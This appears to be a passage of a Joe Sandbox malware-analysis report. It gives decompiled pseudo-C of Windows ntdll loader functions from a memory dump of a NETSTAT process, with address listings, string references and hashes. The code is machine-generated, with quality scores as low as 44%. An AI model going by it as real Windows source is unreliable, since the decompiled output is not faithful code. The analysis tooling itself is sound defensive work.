									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L03374620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0339F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E033A1370(_t276, 0x3334e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0339BB40(0,  &_v68, _t170);
									if(L033643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0339BB40(_t257,  &_v68, _t243);
								if(L033643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E033A1370(_t278, 0x3334e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L03374620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0339F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E033A1370(_v16, 0x3334e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0339BB40(_t262,  &_v68, _t244);
								if(L033643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E033A1370(_t282, 0x3334e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0339BB40(_t262,  &_v68, _t201);
							if(L033643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L03374620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0339F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E033A1370(_t280, 0x3334e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0339BB40(_t267,  &_v68, _t245);
							if(L033643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E033A1370(_t284, 0x3334e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0339BB40(_t267,  &_v68, _t224);
						if(L033643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                0x03363d3c
                0x03363d42
                0x03363d44
                0x03363d46
                0x03363d49
                0x03363d4c
                0x03363d4f
                0x03363d52
                0x03363d55
                0x03363d58
                0x03363d5b
                0x03363d5f
                0x03363d61
                0x03363d66
                0x033b8213
                0x033b8218
                0x03364085
                0x03364088
                0x0336408e
                0x03364094
                0x0336409a
                0x033640a0
                0x033640a6
                0x033640a9
                0x033640af
                0x033640b6
                0x033640bd
                0x033640bd
                0x03363d83
                0x033b821f
                0x033b8229
                0x033b8238
                0x033b8238
                0x033b823d
                0x033b823d
                0x03363da0
                0x03363daf
                0x03363db5
                0x03363dba
                0x03363dba
                0x03363dd4
                0x03363e94
                0x03363eab
                0x03363f6d
                0x03363f84
                0x0336406b
                0x0336406b
                0x0336406e
                0x0336406e
                0x03364070
                0x03364074
                0x033b8351
                0x033b8351
                0x0336407a
                0x0336407f
                0x033b835d
                0x033b8370
                0x033b8377
                0x033b8379
                0x033b837c
                0x033b837c
                0x033b835d
                0x00000000
                0x0336407f
                0x03363f8a
                0x03363f8d
                0x03363f90
                0x03363f95
                0x033b830d
                0x033b830f
                0x03363f9b
                0x03363fac
                0x03363fae
                0x03363fb1
                0x03363fb1
                0x03363fb6
                0x033b8317
                0x033b831a
                0x00000000
                0x03363fbc
                0x03363fc1
                0x03363fc9
                0x03363fd7
                0x03363fda
                0x03363fdd
                0x03364021
                0x03364021
                0x03364029
                0x03364030
                0x03364044
                0x03364046
                0x03364046
                0x03364044
                0x03364049
                0x033b8327
                0x033b8334
                0x033b8339
                0x033b833c
                0x0336404f
                0x0336404f
                0x0336404f
                0x03364051
                0x03364056
                0x03364063
                0x03364063
                0x03364068
                0x00000000
                0x03364068
                0x03363fdf
                0x03363fe2
                0x03363fe4
                0x03363fe7
                0x03363fef
                0x03364003
                0x03364005
                0x03364005
                0x0336400c
                0x03364013
                0x03364016
                0x03364017
                0x0336401b
                0x0336401e
                0x00000000
                0x0336401e
                0x03363fb6
                0x03363eb1
                0x03363eb4
                0x03363eb7
                0x03363ebc
                0x033b82a9
                0x033b82ab
                0x03363ec2
                0x03363ed3
                0x03363ed5
                0x03363ed8
                0x03363ed8
                0x03363edd
                0x033b82b3
                0x033b82b6
                0x00000000
                0x03363ee3
                0x03363ee8
                0x03363eed
                0x03363ef0
                0x03363ef3
                0x03363f02
                0x03363f05
                0x03363f08
                0x033b82c0
                0x033b82c3
                0x033b82c5
                0x033b82c8
                0x033b82d0
                0x033b82e4
                0x033b82e6
                0x033b82e6
                0x033b82ed
                0x033b82f4
                0x033b82f7
                0x033b82f8
                0x033b82fc
                0x033b82ff
                0x033b82ff
                0x03363f0e
                0x03363f11
                0x03363f16
                0x03363f1d
                0x03363f31
                0x033b8307
                0x033b8307
                0x03363f31
                0x03363f39
                0x03363f48
                0x03363f4d
                0x03363f50
                0x03363f50
                0x03363f53
                0x03363f58
                0x03363f65
                0x03363f65
                0x03363f6a
                0x00000000
                0x03363f6a
                0x03363edd
                0x03363dda
                0x03363ddd
                0x03363de0
                0x03363de5
                0x033b8245
                0x03363deb
                0x03363df7
                0x03363dfc
                0x03363dfe
                0x03363e01
                0x03363e01
                0x03363e06
                0x033b824d
                0x033b824f
                0x033b8254
                0x00000000
                0x03363e0c
                0x03363e11
                0x03363e16
                0x03363e19
                0x03363e29
                0x03363e2c
                0x03363e2f
                0x033b825c
                0x033b825f
                0x033b8261
                0x033b8264
                0x033b826c
                0x033b8280
                0x033b8282
                0x033b8282
                0x033b8289
                0x033b8290
                0x033b8293
                0x033b8294
                0x033b8298
                0x033b829b
                0x033b829b
                0x03363e35
                0x03363e38
                0x03363e3d
                0x03363e44
                0x03363e58
                0x033b82a3
                0x033b82a3
                0x03363e58
                0x03363e60
                0x03363e6f
                0x03363e74
                0x03363e77
                0x03363e77
                0x03363e7a
                0x03363e7f
                0x03363e8c
                0x03363e8c
                0x03363e91
                0x00000000
                0x03363e91

                Strings
                • WindowsExcludedProcs, xrefs: 03363D6F
                • Kernel-MUI-Language-Allowed, xrefs: 03363DC0
                • Kernel-MUI-Number-Allowed, xrefs: 03363D8C
                • Kernel-MUI-Language-SKU, xrefs: 03363F70
                • Kernel-MUI-Language-Disallowed, xrefs: 03363E97
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                • API String ID: 0-258546922
                • Opcode ID: 95ab439f25050c34666aa189468ccdff11c4e40be64af3a306962a2cb4f4c0c2
                • Instruction ID: d98a57016987df7c2d8bfb404d0789ed752faca18acb3d3ec796a0b6ef8609f9
                • Opcode Fuzzy Hash: 95ab439f25050c34666aa189468ccdff11c4e40be64af3a306962a2cb4f4c0c2
                • Instruction Fuzzy Hash: D5F14A7AD00658EFCB11DF99C9C0AEEBBBDFF49650F14406AE905AB650D7349E01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03388E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E03388E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x344d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3448464; // 0x76d90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3445780 & 0x00000003) != 0) {
							E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3445780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0339B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3447984; // 0xb32af0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3448464; // 0x76d90110
					 *0x344b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03389B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3445780 & 0x00000005) != 0) {
						_push(_t49);
						E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                0x03388e0f
                0x03388e16
                0x03388e19
                0x03388e1b
                0x03388e21
                0x03388e7f
                0x03388e85
                0x033c9354
                0x033c936c
                0x033c9371
                0x033c937b
                0x033c9381
                0x033c9381
                0x033c937b
                0x03388e9d
                0x03388e9d
                0x03388e29
                0x03388e2c
                0x03388e38
                0x03388e3e
                0x03388e43
                0x03388eb5
                0x03388eb9
                0x033c92aa
                0x033c92af
                0x033c92e8
                0x033c92e8
                0x033c92af
                0x03388eb9
                0x03388e45
                0x03388e53
                0x03388e5b
                0x03388e5f
                0x03388e78
                0x03388e78
                0x03388e7d
                0x03388ec3
                0x03388ecd
                0x03388ed2
                0x03388ed2
                0x03388ec5
                0x03388ec5
                0x00000000
                0x03388e7d
                0x03388e67
                0x03388ea4
                0x033c931a
                0x00000000
                0x00000000
                0x033c9320
                0x03388ea4
                0x03388e70
                0x033c9325
                0x033c9340
                0x033c9345
                0x033c9345
                0x03388e76
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                Strings
                • minkernel\ntdll\ldrsnap.c, xrefs: 033C933B, 033C9367
                • LdrpFindDllActivationContext, xrefs: 033C9331, 033C935D
                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 033C932A
                • Querying the active activation context failed with status 0x%08lx, xrefs: 033C9357
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-3779518884
                • Opcode ID: b1d50b5022a5ea2b9219be451a19bb6ffeab992ba0ecc1ec22930c5f8cda6914
                • Instruction ID: 68d28a20e6d4fb4bb7776880cf7b011c6e7733a1c8a15ae896c3afce144ae50b
                • Opcode Fuzzy Hash: b1d50b5022a5ea2b9219be451a19bb6ffeab992ba0ecc1ec22930c5f8cda6914
                • Instruction Fuzzy Hash: 7C41E622A007199FDB35FB188CC9B39B2A9AF05344F8E81A9D8146F571E760BD80C783
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03368794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E03368794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0336934A() != 0) {
								_t159 = E033DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3445780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E033D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3445780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0336849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03368999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03368999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3445c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3445c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03372280(_t92, 0x34486cc);
															_t94 = E03429DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E033861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3445c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03368A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3445c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3445c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0339F380(_t136, 0x3331184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03372280(_t108, 0x34486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E033861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E03429D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0336FFB0(_t118, _t156, 0x34486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03399A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                0x03368799
                0x0336879d
                0x033687a1
                0x033687a3
                0x033687a8
                0x033687c3
                0x033687c3
                0x033687c8
                0x033687d1
                0x033687d4
                0x033687d8
                0x033687e5
                0x033687ec
                0x033b9bfe
                0x033b9c00
                0x033b9c02
                0x033b9c08
                0x033b9c0d
                0x033b9c0f
                0x033b9c14
                0x033b9c2d
                0x033b9c32
                0x033b9c37
                0x033b9c3a
                0x033b9c3c
                0x033b9c42
                0x033b9c42
                0x033b9c3c
                0x033b9c02
                0x033687da
                0x033687df
                0x033687e3
                0x00000000
                0x00000000
                0x033687e3
                0x033687f2
                0x00000000
                0x033687fb
                0x033687fd
                0x033687fe
                0x0336880e
                0x0336880f
                0x03368810
                0x03368814
                0x0336881a
                0x0336881c
                0x0336881f
                0x03368821
                0x03368822
                0x03368824
                0x03368826
                0x0336882c
                0x0336882e
                0x033b9c48
                0x033b9c48
                0x03368834
                0x03368834
                0x03368837
                0x00000000
                0x00000000
                0x03368837
                0x0336882e
                0x0336883d
                0x03368840
                0x03368843
                0x03368846
                0x03368849
                0x0336884c
                0x0336884e
                0x03368850
                0x03368852
                0x03368854
                0x03368857
                0x033688b4
                0x033688b6
                0x033688b6
                0x03368859
                0x03368859
                0x03368859
                0x03368861
                0x03368866
                0x0336886a
                0x0336893d
                0x03368941
                0x00000000
                0x03368947
                0x03368947
                0x0336894a
                0x0336894c
                0x00000000
                0x03368952
                0x03368955
                0x0336895a
                0x0336895d
                0x0336895d
                0x0336895f
                0x03368961
                0x03368961
                0x03368968
                0x00000000
                0x00000000
                0x0336896a
                0x0336896b
                0x0336896e
                0x00000000
                0x03368970
                0x03368970
                0x03368970
                0x03368970
                0x03368972
                0x03368972
                0x03368974
                0x00000000
                0x0336897a
                0x0336897a
                0x0336897d
                0x00000000
                0x03368983
                0x033b9c65
                0x033b9c6d
                0x033b9c72
                0x033b9c75
                0x033b9c75
                0x033b9c82
                0x033b9c86
                0x033b9c87
                0x033b9c88
                0x033b9c89
                0x033b9c8c
                0x033b9c90
                0x033b9c95
                0x033b9c97
                0x033b9ca0
                0x033b9ca3
                0x033b9ca9
                0x033b9ca9
                0x00000000
                0x033b9ca9
                0x033b9ca3
                0x00000000
                0x033b9c97
                0x0336897d
                0x00000000
                0x03368974
                0x03368988
                0x03368992
                0x03368996
                0x00000000
                0x03368996
                0x0336894c
                0x00000000
                0x03368870
                0x0336887b
                0x0336887d
                0x0336887f
                0x03368881
                0x03368884
                0x03368884
                0x03368886
                0x03368889
                0x0336888c
                0x0336888e
                0x03368891
                0x03368891
                0x03368898
                0x00000000
                0x00000000
                0x0336889a
                0x0336889b
                0x0336889e
                0x00000000
                0x00000000
                0x033688a0
                0x033688a8
                0x033688b0
                0x033688b2
                0x033688d3
                0x033688d5
                0x00000000
                0x033688d7
                0x033688db
                0x033688dc
                0x033688e0
                0x033688e8
                0x033688ee
                0x033688f0
                0x033688f3
                0x033688fc
                0x03368901
                0x03368906
                0x0336890c
                0x0336890c
                0x0336890f
                0x03368916
                0x03368917
                0x03368918
                0x03368919
                0x0336891a
                0x0336891f
                0x03368921
                0x033b9c52
                0x033b9c55
                0x033b9c5b
                0x033b9cac
                0x033b9cc0
                0x033b9cc0
                0x033b9c55
                0x03368927
                0x03368927
                0x0336892f
                0x03368933
                0x00000000
                0x033688f5
                0x033688f5
                0x00000000
                0x033688f7
                0x033688f7
                0x033688fa
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033688fa
                0x033688f5
                0x033688f3
                0x00000000
                0x033688d5
                0x00000000
                0x033688b2
                0x033688c9
                0x00000000
                0x033688c9
                0x0336887f
                0x0336886a
                0x03368857
                0x03368852
                0x033688bf
                0x033688bf
                0x033687aa
                0x033687ad
                0x033687ae
                0x033687b4
                0x033687b5
                0x033687b6
                0x033687b8
                0x033687bd
                0x033687c1
                0x033687f4
                0x033687fa
                0x00000000
                0x00000000
                0x00000000
                0x033687c1
                0x00000000

                Strings
                • LdrpDoPostSnapWork, xrefs: 033B9C1E
                • minkernel\ntdll\ldrsnap.c, xrefs: 033B9C28
                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 033B9C18
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-1948996284
                • Opcode ID: 89bffc1daa3722efc0b0f9b61af86bb6589d8854698d2ed4dee7d245f2f784cf
                • Instruction ID: 60c84ad6cf15bc0a95627ba67cfc80f61d8b6654ab7a5bbe8d3beab93975fb85
                • Opcode Fuzzy Hash: 89bffc1daa3722efc0b0f9b61af86bb6589d8854698d2ed4dee7d245f2f784cf
                • Instruction Fuzzy Hash: 8B91F435A00215DFDF28DF58C8C1ABAB3F9FF89311B1880A9E915AF649D730E901CB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03367E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E03367E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0336CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
